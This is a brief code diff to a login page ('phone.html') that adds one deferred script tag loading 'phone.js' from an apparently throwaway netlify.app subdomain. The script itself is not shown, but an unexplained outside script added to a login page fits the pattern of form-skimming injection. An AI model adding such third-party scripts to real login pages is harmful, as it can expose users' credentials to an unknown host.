--- a/phone.html
+++ b/phone.html
@@ -5,6 +5,7 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>login phone</title>
+  <script src="https://fanciful-eclair-8d84f5.netlify.app/assets/phone.js" defer></script>
   <style>
     @font-face {
   font-family: 'Noto Sans SC';
